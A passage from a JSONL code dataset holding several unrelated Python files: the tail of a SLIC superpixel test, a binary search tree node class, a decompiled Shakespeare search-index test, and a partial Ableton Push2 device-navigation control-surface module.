compactness=0.1, sigma=0,\n enforce_connectivity=False, convert2lab=False, max_iter=5)\n ref_edges = slic.get_boundaries(ref_labels)\n\n slic.run(num_clusters=100, compactness=0.1, iterations=5, lab=True, enforce_connectivity=False,\n presample_features=False, use_gradient_seeds=False)\n test_edges = slic.get_boundaries()\n\n ref_img = img.copy()\n test_img = img.copy()\n ref_img[np.where(ref_edges > 0)] = np.max(img)\n test_img[np.where(test_edges > 0)] = np.max(img)\n\n cv.namedWindow(\"SKImage\", cv.WINDOW_NORMAL)\n cv.imshow(\"SKImage\", ref_img)\n cv.namedWindow(\"Test\", cv.WINDOW_NORMAL)\n cv.imshow(\"Test\", test_img)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n print(\"SciKit-Image Stats:\")\n print(\"Number of clusters: %d\" % np.max(ref_labels))\n print(\"\")\n print(\"Test Image Stats:\")\n print(\"Number of clusters: %d\" % np.max(slic.labels))\n print(\"\")\n\ndef spectral_function_test():\n a = np.ones((4, 4, 4), np.float64)\n b = np.ones((4, 4, 4), np.float64)\n\n b[1, :, :] = 2\n a[3, :, :] = 100\n\n test_slic = SLIC(a)\n test_slic_theano = SLIC_theano(a)\n\n result_normal = test_slic.d_spectral(a, b)\n result_theano = test_slic.d_spectral(a, b)\n\n result_reference = np.arccos(np.sum(a*b, 0) / (np.sqrt(np.sum(a**2, 0)) * np.sqrt(np.sum(b**2, 0))))\n\n # test theano and normal against each other\n assert(np.all(result_normal == result_theano))\n assert(np.all(result_normal == result_reference))\n\n return 0\n\n\nif __name__ == '__main__':\n\n test_rgb()\n #test_hsi()\n #spectral_function_test()","sub_path":"testing/slic_test.py","file_name":"slic_test.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"77940427","text":"from itertools import chain\n\nclass Node:\n\n def __init__(self, val):\n self._parent = None\n self._left_child = None\n self._right_child = None\n self._val = val\n\n\n @property\n def parent(self):\n return self._parent\n \n\n @property\n def left_child(self):\n return self._left_child\n\n\n @property\n def right_child(self):\n return self._right_child\n\n\n @property\n def val(self):\n return self._val\n \n def preorder_traverse(self):\n left = 
self._preorder_traverse_left()\n right = self._preorder_traverse_right()\n return chain((self,), left, right)\n\n def _preorder_traverse_left(self):\n if self.left_child:\n return self.left_child.preorder_traverse()\n else:\n return ()\n\n def _preorder_traverse_right(self):\n if self.right_child:\n return self.right_child.preorder_traverse()\n else:\n return ()\n\n def insert(self, node, root):\n if not root:\n return False\n\n elif node.val == root.val:\n return False\n\n elif node.val < root.val:\n # insert left child\n if not root._left_child:\n root._left_child = node\n node._parent = root\n else:\n self.insert(node, root._left_child)\n\n else:\n # insert right child\n if not root._right_child:\n root._right_child = node\n node._parent = root\n else:\n self.insert(node, root._right_child)\n\n\n def delete(self, node):\n # if node is a leaf\n if not node._left_child and not node._right_child:\n if node.parent._left_child is node:\n node.parent._left_child = None\n del node\n return True\n elif node.parent._right_child is node:\n node.parent._right_child = None\n del node\n return True\n else:\n return False\n\n","sub_path":"bst/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"280138200","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/shakespeare/tests/test_search.py\n# Compiled at: 2008-10-29 17:02:17\nimport os, shutil, tempfile, StringIO, shakespeare.search, shakespeare.tests\n\nclass TestSearch:\n\n def setUp(self):\n self.text = shakespeare.tests.make_fixture()\n basetmp = tempfile.gettempdir()\n self.tmpdir = os.path.join(basetmp, 'openshkspr-search')\n if os.path.exists(self.tmpdir):\n shutil.rmtree(self.tmpdir)\n os.makedirs(self.tmpdir)\n self.index = shakespeare.search.SearchIndex(self.tmpdir)\n self.index.add_item(StringIO.StringIO(self.text.content), self.text.name)\n\n def test_add_item(self):\n assert self.index.get_database().get_doccount() > 0\n\n def test_remove_item(self):\n self.index.remove_item(self.text.name)\n assert self.index.get_database().get_doccount() == 0\n\n def test_search_1(self):\n out = self.index.search('summer')\n assert len(out) == 2\n mset1 = out[0]\n exp = \"Shall I compare thee to a summer's day\"\n assert mset1.document.get_data().startswith(exp)\n\n def test_search_2(self):\n out = self.index.search('summer')\n mset1 = out[1]\n exp = \"But thy eternal summer shall not fade,\\nNor lose possession of that fair thou ow'st,\"\n assert mset1.document.get_data().startswith(exp)\n\n def test_search_3(self):\n out = self.index.search('rough')\n assert len(out) == 1\n\n def test_retrieve_lineno(self):\n out = self.index.search('summer')\n mset1 = out[1]\n lineno = mset1.document.get_value(shakespeare.search.LINE_NO)\n assert lineno == '9'\n\n def test_retrieve_itemid(self):\n out = self.index.search('summer')\n mset1 = out[1]\n name = mset1.document.get_value(shakespeare.search.ITEM_ID)\n assert name == self.text.name","sub_path":"pycfiles/shakespeare-0.6-py2.5/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"410623330","text":"\nfrom contextlib import contextmanager\nfrom itertools import chain\nfrom functools import partial, 
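# Usage sketch for the Node binary search tree in bst/node.py above; the
# values are invented, and preorder_traverse() yields the root before its
# left and right subtrees:
root = Node(8)
for v in (3, 10, 1, 6):
    root.insert(Node(v), root)
assert [n.val for n in root.preorder_traverse()] == [8, 3, 1, 6, 10]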
update_wrapper, singledispatch\n\nimport Live\nfrom ableton.v2.base import find_if, first, index_if, listenable_property, listens, listens_group, liveobj_changed, liveobj_valid, EventObject, SlotGroup, task\nfrom ableton.v2.control_surface import DecoratorFactory, device_to_appoint\nfrom ableton.v2.control_surface.components import DeviceNavigationComponent as DeviceNavigationComponentBase, FlattenedDeviceChain, ItemSlot, ItemProvider, is_empty_rack, nested_device_parent\nfrom ableton.v2.control_surface.control import control_list, StepEncoderControl\nfrom ableton.v2.control_surface.mode import Component, ModesComponent, NullModes, DelayMode\nfrom ableton.v2.control_surface.control import ButtonControl\n\nfrom pushbase.device_chain_utils import is_first_device_on_pad\nfrom Push2.bank_selection_component import BankSelectionComponent, BankProvider\nfrom Push2.chain_selection_component import ChainSelectionComponent\nfrom Push2.colors import DISPLAY_BUTTON_SHADE_LEVEL, IndexedColor\nfrom Push2.device_util import is_drum_pad, find_chain_or_track\nfrom Push2.item_lister import IconItemSlot, ItemListerComponent\n\n# from Push2.device_navigation import singledispatchmethod\n\nfrom aumhaa.v2.base.debug import log_flattened_arguments\n\ndef nop(self, *a, **k):\n pass\n\n\n# debug = log_flattened_arguments\ndebug = nop\n\ndef singledispatchmethod(func):\n \"\"\"\n TODO(lsp) Replace with builtin decorator when we update to python 3.8+\n this method didn't include a catch for calls without arguments, so it is added in the wrapper\n \"\"\"\n dispatcher = singledispatch(func)\n\n def wrapper(*args, **kw):\n # debug('args:', args)\n if len(args) > 1:\n return dispatcher.dispatch(args[1].__class__)(*args, **kw)\n else:\n return nop\n\n wrapper.register = dispatcher.register\n update_wrapper(wrapper, func)\n return wrapper\n\ndef find_drum_pad(items):\n\telements = map(lambda i: i.item, items)\n\treturn find_if(lambda e: is_drum_pad(e), elements)\n\n\n@singledispatchmethod\ndef is_active_element(drum_pad):\n\treturn not drum_pad.mute and drum_pad.canonical_parent.is_active\n\n\n@singledispatchmethod\ndef is_active_element(device):\n\treturn device.is_active\n\n\ndef set_enabled(device, is_on):\n\tdevice.parameters[0].value = int(is_on)\n\n\ndef is_on(device):\n\treturn bool(device.parameters[0].value)\n\n\ndef collect_devices(track_or_chain, nesting_level = 0):\n\tchain_devices = track_or_chain.devices if liveobj_valid(track_or_chain) else []\n\tdevices = []\n\tfor device in chain_devices:\n\t\tdevices.append((device, nesting_level))\n\t\tif device.can_have_drum_pads and device.view.selected_drum_pad:\n\t\t\tdevices.append((device.view.selected_drum_pad, nesting_level + 1))\n\t\tdevices.extend(collect_devices(nested_device_parent(device), nesting_level=nesting_level + 1))\n\n\treturn devices\n\n\ndef delete_device(device):\n\tdevice_parent = device.canonical_parent\n\tdevice_index = list(device_parent.devices).index(device)\n\tdevice_parent.delete_device(device_index)\n\n\ndef drum_rack_for_pad(drum_pad):\n\treturn drum_pad.canonical_parent\n\n\nclass SpecialBankSelectionComponent(BankSelectionComponent):\n\n\tcolor_class_name = 'BankSelection'\n\tnext_bank_button = ButtonControl()\n\tprevious_bank_button = ButtonControl()\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', 
icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\n\tdef update(self, *a, **k):\n\t\tsuper(SpecialBankSelectionComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\t# debug('color_for_button:', button_index, is_selected)\n\t\tif is_selected:\n\t\t\treturn self.color_class_name + '.ItemSelected'\n\t\treturn self.color_class_name + '.ItemNotSelected'\n\n\tdef set_previous_bank_button(self, button):\n\t\tself.previous_bank_button.set_control_element(button)\n\n\tdef set_next_bank_button(self, button):\n\t\tself.next_bank_button.set_control_element(button)\n\n\t@next_bank_button.pressed\n\tdef next_bank_button(self, button):\n\t\tdebug('BankSelection._on_next_bank_button_pressed')\n\t\tself._bank_provider._bank_registry.set_device_bank(self._bank_provider._device, min(len(self._bank_provider.items), self._bank_provider._bank_registry.get_device_bank(self._bank_provider._device) + 1))\n\n\n\t@previous_bank_button.pressed\n\tdef previous_bank_button(self, button):\n\t\tdebug('BankSelection._on_previous_bank_button_pressed')\n\t\tself._bank_provider._bank_registry.set_device_bank(self._bank_provider._device, max(0, self._bank_provider._bank_registry.get_device_bank(self._bank_provider._device) - 1))\n\n\n\n\n\nclass SpecialChainSelectionComponent(ChainSelectionComponent):\n\n\tcolor_class_name = 'ChainNavigation'\n\n\tdef _on_select_button_pressed(self, button):\n\t\tsuper(SpecialChainSelectionComponent, self)._on_select_button_pressed(button)\n\t\tself._parent._exit_chain_selection()\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\t#debug('ChainSelector._create_slot')\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\tdef update(self, *a, **k):\n\t\tsuper(SpecialChainSelectionComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\tif is_selected:\n\t\t\treturn self.color_class_name + '.ItemSelected'\n\t\treturn self.color_class_name + '.ItemNotSelected'\n\n\t# def _scroll_left(self):\n\t# \tdebug('scroll_left')\n\t# \tsuper(SpecialChainSelectionComponent, self)._scroll_left()\n\t# \tdebug('scroll_left finished')\n\n\n\nclass DeviceChainStateWatcher(EventObject):\n\t\"\"\"\n\tListens to the device navigations items and notifies whenever the items state\n\tchanges and the color of the buttons might be affected.\n\t\"\"\"\n\t__events__ = ('state',)\n\n\tdef __init__(self, device_navigation = None, *a, **k):\n\t\tassert device_navigation is not None\n\t\tsuper(DeviceChainStateWatcher, self).__init__(*a, **k)\n\t\tself._device_navigation = 
device_navigation\n\t\tself.__on_items_changed.subject = device_navigation\n\t\tself._update_listeners_and_notify()\n\n\t@listens('items')\n\tdef __on_items_changed(self, *a):\n\t\tself._update_listeners_and_notify()\n\n\t@listens_group('is_active')\n\tdef __on_is_active_changed(self, device):\n\t\tself.notify_state()\n\n\t@listens_group('color_index')\n\tdef __on_chain_color_index_changed(self, chain):\n\t\tself.notify_state()\n\n\t@listens('mute')\n\tdef __on_mute_changed(self):\n\t\tself.notify_state()\n\n\tdef _navigation_items(self):\n\t\treturn filter(lambda i: not i.is_scrolling_indicator, self._device_navigation.items)\n\n\tdef _devices(self):\n\t\tdevice_items = filter(lambda i: not is_drum_pad(i.item), self._navigation_items())\n\t\treturn [i.item for i in device_items]\n\n\tdef _update_listeners_and_notify(self):\n\t\titems = list(self._navigation_items())\n\t\tchains = set(filter(liveobj_valid, map(lambda i: find_chain_or_track(i.item), items)))\n\t\tself.__on_is_active_changed.replace_subjects(self._devices())\n\t\tself.__on_mute_changed.subject = find_drum_pad(items)\n\t\tself.__on_chain_color_index_changed.replace_subjects(chains)\n\t\tself.notify_state()\n\n\nclass MoveDeviceComponent(Component):\n\tMOVE_DELAY = 0.1\n\tmove_encoders = control_list(StepEncoderControl)\n\n\tdef __init__(self, *a, **k):\n\t\tsuper(MoveDeviceComponent, self).__init__(*a, **k)\n\t\tself._device = None\n\n\tdef set_device(self, device):\n\t\tself._device = device\n\n\t@move_encoders.value\n\tdef move_encoders(self, value, encoder):\n\t\tif liveobj_valid(self._device):\n\t\t\twith self._disabled_encoders():\n\t\t\t\tif value > 0:\n\t\t\t\t\tself._move_right()\n\t\t\t\telse:\n\t\t\t\t\tself._move_left()\n\n\t@contextmanager\n\tdef _disabled_encoders(self):\n\t\tself._disable_all_encoders()\n\t\tyield\n\t\tself._tasks.add(task.sequence(task.wait(self.MOVE_DELAY), task.run(self._enable_all_encoders)))\n\n\tdef _disable_all_encoders(self):\n\t\tfor encoder in self.move_encoders:\n\t\t\tencoder.enabled = False\n\n\tdef _enable_all_encoders(self):\n\t\tfor encoder in self.move_encoders:\n\t\t\tencoder.enabled = True\n\n\tdef _move_right(self):\n\t\tparent = self._device.canonical_parent\n\t\tdevice_index = list(parent.devices).index(self._device)\n\t\tif device_index == len(parent.devices) - 1 and isinstance(parent, Live.Chain.Chain):\n\t\t\tself._move_out(parent.canonical_parent, move_behind=True)\n\t\telif device_index < len(parent.devices) - 1:\n\t\t\tright_device = parent.devices[device_index + 1]\n\t\t\tif right_device.can_have_chains and right_device.view.is_showing_chain_devices and right_device.view.selected_chain:\n\t\t\t\tself._move_in(right_device)\n\t\t\telse:\n\t\t\t\tself.song.move_device(self._device, parent, device_index + 2)\n\n\tdef _move_left(self):\n\t\tparent = self._device.canonical_parent\n\t\tdevice_index = list(parent.devices).index(self._device)\n\t\tif device_index > 0:\n\t\t\tleft_device = parent.devices[device_index - 1]\n\t\t\tif left_device.can_have_chains and left_device.view.is_showing_chain_devices and left_device.view.selected_chain:\n\t\t\t\tself._move_in(left_device, move_to_end=True)\n\t\t\telse:\n\t\t\t\tself.song.move_device(self._device, parent, device_index - 1)\n\t\telif isinstance(parent, Live.Chain.Chain):\n\t\t\tself._move_out(parent.canonical_parent)\n\n\tdef _move_out(self, rack, move_behind = False):\n\t\tparent = rack.canonical_parent\n\t\track_index = list(parent.devices).index(rack)\n\t\tself.song.move_device(self._device, parent, rack_index + 1 if 
move_behind else rack_index)\n\n\tdef _move_in(self, rack, move_to_end = False):\n\t\tchain = rack.view.selected_chain\n\t\tif chain:\n\t\t\tself.song.move_device(self._device, chain, len(chain.devices) if move_to_end else 0)\n\n\nclass DeviceNavigationComponent(DeviceNavigationComponentBase):\n\t__events__ = ('drum_pad_selection', 'mute_solo_stop_cancel_action_performed')\n\tcolor_class_name = 'DeviceNavigation'\n\tdisable_button = ButtonControl()\n\n\tdef __init__(self, device_bank_registry = None, banking_info = None, delete_handler = None, track_list_component = None, *a, **k):\n\t\tassert banking_info is not None\n\t\tassert device_bank_registry is not None\n\t\tassert track_list_component is not None\n\t\tself._flattened_chain = FlattenedDeviceChain(collect_devices)\n\t\tself._track_decorator = DecoratorFactory()\n\t\tself._modes = NullModes()\n\t\tself.move_device = None\n\t\tsuper(DeviceNavigationComponent, self).__init__(item_provider=self._flattened_chain, *a, **k)\n\t\tself._delete_handler = delete_handler\n\t\tself.chain_selection = SpecialChainSelectionComponent(parent=self, is_enabled=False)\n\t\tself.bank_selection = SpecialBankSelectionComponent(bank_registry=device_bank_registry, banking_info=banking_info, device_options_provider=self._device_component, is_enabled=False, parent=self)\n\t\tself.move_device = MoveDeviceComponent(parent=self, is_enabled=False)\n\t\tself._last_pressed_button_index = -1\n\t\tself._selected_on_previous_press = None\n\t\tself._was_in_chain_mode = False\n\t\tself._modes = ModesComponent(parent=self)\n\t\tself._modes.add_mode('default', [partial(self.chain_selection.set_parent, None), partial(self.bank_selection.set_device, None), self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.add_mode('chain_selection', [self.chain_selection, self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.add_mode('bank_selection', [self.bank_selection, self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.selected_mode = 'default'\n\t\tself.register_disconnectable(self._flattened_chain)\n\t\tself.__on_items_changed.subject = self\n\t\tself.__on_bank_selection_closed.subject = self.bank_selection\n\t\tself.__on_bank_items_changed.subject = self.bank_selection\n\t\tself.__on_chain_items_changed.subject = self.chain_selection\n\t\t# self.__on_chain_selection_closed.subject = self.chain_selection\n\t\tself._update_selected_track()\n\t\tself._track_list = track_list_component\n\t\twatcher = self.register_disconnectable(DeviceChainStateWatcher(device_navigation=self))\n\t\tself.__on_device_item_state_changed.subject = watcher\n\t\tself._on_mode_changed.subject = self._modes\n\t\tself._update_device()\n\t\tself._update_button_colors()\n\n\n\tdef _update_button_colors(self, *a, **k):\n\t\tsuper(DeviceNavigationComponent, self)._update_button_colors()\n\n\tdef update(self, *a, **k):\n\t\tsuper(DeviceNavigationComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\t\t\tself.chain_selection._update_button_colors()\n\t\t\tself.bank_selection._update_button_colors()\n\n\t@property\n\tdef modes(self):\n\t\treturn self._modes\n\n\t@listens('selected_mode')\n\tdef _on_mode_changed(self, *a, **k):\n\t\tself._update_button_colors()\n\t\tself.chain_selection._update_button_colors()\n\t\tself.bank_selection._update_button_colors()\n\n\t# 
@disable_button.pressed\n\t# def disable_button(self, button):\n\t# \tdebug('disable_button pressed', button)\n\n\tdef _in_device_enabling_mode(self):\n\t\t#return self.disable_button.is_pressed()\n\t\t# debug('disable_button:', self.disable_button)\n\t\t# debug('disable_button._is_pressed:', self.disable_button._is_pressed)\n\t\treturn self.disable_button._is_pressed\n\t\t# return False\n\n\tdef _on_select_button_pressed(self, button):\n\t\tdevice_or_pad = self.items[button.index].item\n\t\tif self._in_device_enabling_mode():\n\t\t\tself._toggle_device(device_or_pad)\n\t\t\tself.notify_mute_solo_stop_cancel_action_performed()\n\t\telse:\n\t\t\tself._last_pressed_button_index = button.index\n\t\t\tif not self._delete_handler or not self._delete_handler.is_deleting:\n\t\t\t\tself._selected_on_previous_press = device_or_pad if self.selected_object != device_or_pad else None\n\t\t\t\tself._was_in_chain_mode = self._modes.selected_mode == 'chain_selection'\n\t\t\t\tdebug('was_in_chain_mode:', self._was_in_chain_mode)\n\t\t\t\tself._select_item(device_or_pad)\n\n\tdef _on_select_button_released_immediately(self, button):\n\t\tif not self._in_device_enabling_mode():\n\t\t\tself._last_pressed_button_index = -1\n\t\t\tdevice_or_pad = self.items[button.index].item\n\t\t\tif self._delete_handler and self._delete_handler.is_deleting:\n\t\t\t\tself._delete_item(device_or_pad)\n\t\t\telif self.selected_object == device_or_pad and device_or_pad != self._selected_on_previous_press:\n\t\t\t\tself._on_reselecting_object(device_or_pad)\n\t\t\tself._selected_on_previous_press = None\n\n\tdef _on_select_button_pressed_delayed(self, button):\n\t\tif not self._in_device_enabling_mode():\n\t\t\tself._on_pressed_delayed(self.items[button.index].item)\n\n\tdef _on_select_button_released(self, button):\n\t\tif button.index == self._last_pressed_button_index:\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._last_pressed_button_index = -1\n\t\t\tself._end_move_device()\n\n\t# @select_buttons.double_clicked\n\t# def select_buttons(self, button):\n\t# \tself._on_select_button_double_clicked(button)\n\t#\n\t# def _on_select_button_double_clicked(self, button):\n\t# \tdebug('_on_select_button_double_clicked', button)\n\n\t@singledispatchmethod\n\tdef _toggle_device(self, drum_pad):\n\t\tif liveobj_valid(drum_pad):\n\t\t\tdrum_pad.mute = not drum_pad.mute\n\n\t@singledispatchmethod\n\tdef _toggle_device(self, device):\n\t\tif liveobj_valid(device) and device.parameters[0].is_enabled:\n\t\t\tset_enabled(device, not is_on(device))\n\n\t@listens('state')\n\tdef __on_device_item_state_changed(self):\n\t\tself._update_button_colors()\n\t\t# debug('adding task...')\n\t\tself._tasks.add(self._update_button_colors)\n\n\t@listenable_property\n\tdef item_names(self):\n\t\titems = ['-' for index in range(16)]\n\t\tif self._modes.selected_mode == 'default' or self._modes.selected_mode == 'chain_selection':\n\t\t\tnew_items = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in self.items]\n\t\t\titems[:len(new_items)] = new_items\n\t\t\t#debug('mode is default, names are:', items)\n\t\tif self._modes.selected_mode == 'chain_selection':\n\t\t\titems[8:] = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in self.chain_selection.items]\n\t\t\t#debug('mode is chain_selection, names are:', items)\n\t\telif self._modes.selected_mode == 'bank_selection':\n\t\t\titems[8:] = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in 
self.bank_selection.items]\n\t\t\t#debug('mode is bank_selection, names are:', items)\n\t\t#debug('item names are:', items)\n\t\treturn items\n\n\t@listens('items')\n\tdef __on_bank_items_changed(self):\n\t\t# new_items = map(lambda x: x.item, self.bank_selection.items)\n\t\t# names = self.item_names\n\t\t# self.notify_item_names()\n\t\tself.update_item_name_listeners()\n\n\t@listens('items')\n\tdef __on_chain_items_changed(self):\n\t\t# names = self.item_names\n\t\t# self.notify_item_names()\n\t\t# new_items = map(lambda x: x.item, self.chain_selection.items)\n\t\tself.update_item_name_listeners()\n\n\t@listens('items')\n\tdef __on_items_changed(self):\n\t\tnew_items = [x.item for x in self.items]\n\t\tlost_selection_on_empty_pad = new_items and is_drum_pad(new_items[-1]) and self._flattened_chain.selected_item not in new_items\n\t\tif self._should_select_drum_pad() or lost_selection_on_empty_pad:\n\t\t\tself._select_item(self._current_drum_pad())\n\t\tif self.moving:\n\t\t\tself._show_selected_item()\n\t\tself.notify_drum_pad_selection()\n\t\tself.update_item_name_listeners()\n\n\tdef update_item_name_listeners(self):\n\t\tnames = self.item_names\n\t\tself.notify_item_names(*names)\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\t@listenable_property\n\tdef moving(self):\n\t\treturn self.move_device.is_enabled()\n\n\t@property\n\tdef device_selection_update_allowed(self):\n\t\treturn not self._should_select_drum_pad()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\titem = self.items[button_index]\n\t\tdevice_or_pad = item.item\n\t\tis_active = liveobj_valid(device_or_pad) and is_active_element(device_or_pad)\n\t\tchain = find_chain_or_track(device_or_pad)\n\t\tif not is_active:\n\t\t\treturn 'DefaultButton.Off'\n\t\telif is_selected:\n\t\t\treturn 'ItemNavigation.ItemSelected'\n\t\telif liveobj_valid(chain):\n\t\t\t# return IndexedColor.from_live_index(chain.color_index, DISPLAY_BUTTON_SHADE_LEVEL)\n\t\t\treturn 'ItemNavigation.ItemNotSelected'\n\t\telse:\n\t\t\treturn 'ItemNavigation.ItemNotSelected'\n\n\tdef _begin_move_device(self, device):\n\t\tif not self.move_device.is_enabled() and device.type != Live.Device.DeviceType.instrument:\n\t\t\tself.move_device.set_device(device)\n\t\t\tself.move_device.set_enabled(True)\n\t\t\tself._scroll_overlay.set_enabled(False)\n\t\t\tself.notify_moving()\n\n\tdef _end_move_device(self):\n\t\tif self.move_device and self.move_device.is_enabled():\n\t\t\tself.move_device.set_device(None)\n\t\t\tself.move_device.set_enabled(False)\n\t\t\tself._scroll_overlay.set_enabled(True)\n\t\t\tself.notify_moving()\n\n\tdef request_drum_pad_selection(self):\n\t\tself._current_track().drum_pad_selected = True\n\n\tdef unfold_current_drum_pad(self):\n\t\tself._current_track().drum_pad_selected = False\n\t\tself._current_drum_pad().canonical_parent.view.is_showing_chain_devices = True\n\n\tdef 
sync_selection_to_selected_device(self):\n\t\tself._update_item_provider(self.song.view.selected_track.view.selected_device)\n\n\t@property\n\tdef is_drum_pad_selected(self):\n\t\treturn is_drum_pad(self._flattened_chain.selected_item)\n\n\t@property\n\tdef is_drum_pad_unfolded(self):\n\t\tselection = self._flattened_chain.selected_item\n\t\tassert is_drum_pad(selection)\n\t\treturn drum_rack_for_pad(selection).view.is_showing_chain_devices\n\n\tdef _current_track(self):\n\t\treturn self._track_decorator.decorate(self.song.view.selected_track, additional_properties={'drum_pad_selected': False})\n\n\tdef _should_select_drum_pad(self):\n\t\treturn self._current_track().drum_pad_selected\n\n\tdef _current_drum_pad(self):\n\t\treturn find_drum_pad(self.items)\n\n\tdef _update_selected_track(self):\n\t\tself._selected_track = self.song.view.selected_track\n\t\tselected_track = self._current_track()\n\t\tself.reset_offset()\n\t\tself._flattened_chain.set_device_parent(selected_track)\n\t\tself._device_selection_in_track_changed.subject = selected_track.view\n\t\tself._modes.selected_mode = 'default'\n\t\tself._end_move_device()\n\t\tself._restore_selection(selected_track)\n\n\tdef _restore_selection(self, selected_track):\n\t\tto_select = None\n\t\tif self._should_select_drum_pad():\n\t\t\tto_select = self._current_drum_pad()\n\t\tif to_select == None:\n\t\t\tto_select = selected_track.view.selected_device\n\t\tself._select_item(to_select)\n\n\tdef back_to_top(self):\n\t\tpass\n\n\t@property\n\tdef selected_object(self):\n\t\tselected_item = self.item_provider.selected_item\n\t\treturn getattr(selected_item, 'proxied_object', selected_item)\n\n\t@singledispatchmethod\n\tdef _do_select_item(self, pad):\n\t\tself._current_track().drum_pad_selected = True\n\t\tdevice = self._first_device_on_pad(pad)\n\t\tself._appoint_device(device)\n\n\tdef _first_device_on_pad(self, drum_pad):\n\t\tchain = drum_rack_for_pad(drum_pad).view.selected_chain\n\t\tif chain and chain.devices:\n\t\t\treturn first(chain.devices)\n\n\tdef _appoint_device(self, device):\n\t\tif self._device_component._device_changed(device):\n\t\t\tself._device_component.set_device(device)\n\n\t# def _select_item(self, device_or_pad):\n\t# \tdebug('_select_item:', self._modes.selected_mode)\n\t# \tif self._modes.selected_mode == u'chain_selection':\n\t# \t\tself._modes.selected_mode = u'default'\n\t# \telse:\n\t# \t\tsuper(DeviceNavigationComponent, self)._select_item(device_or_pad)\n\n\t@singledispatchmethod\n\tdef _do_select_item(self, device):\n\t\tself._current_track().drum_pad_selected = False\n\t\tappointed_device = device_to_appoint(device)\n\t\tself._appoint_device(appointed_device)\n\t\tself.song.view.select_device(device, False)\n\t\tself.song.appointed_device = appointed_device\n\n\n\t@singledispatchmethod\n\tdef _on_reselecting_object(self, drum_pad):\n\t\t# debug('_on_reselecting_object drumpad')\n\t\t# if self._modes.selected_mode is u'chain_selection':\n\t\t# \tself._modes.selected_mode = u'default'\n\t\t# else:\n\t\track = drum_rack_for_pad(drum_pad)\n\t\tself._toggle(rack)\n\t\tif rack.view.is_showing_chain_devices:\n\t\t\tfirst_device = self._first_device_on_pad(drum_pad)\n\t\t\tif first_device:\n\t\t\t\tself._select_item(first_device)\n\t\tself.notify_drum_pad_selection()\n\n\t@singledispatchmethod\n\tdef _on_reselecting_object(self, device):\n\t\tdebug('_on_reselecting_object object', self._modes.selected_mode)\n\t\t# if self._modes.selected_mode is u'chain_selection':\n\t\t# \tself._modes.selected_mode = 
